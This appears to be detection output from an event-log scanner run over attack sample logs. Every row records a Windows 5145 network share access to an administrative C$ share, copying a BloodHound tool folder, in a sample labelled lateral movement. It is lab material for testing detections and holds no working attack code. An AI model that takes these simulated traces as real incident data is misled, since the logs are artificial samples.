\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
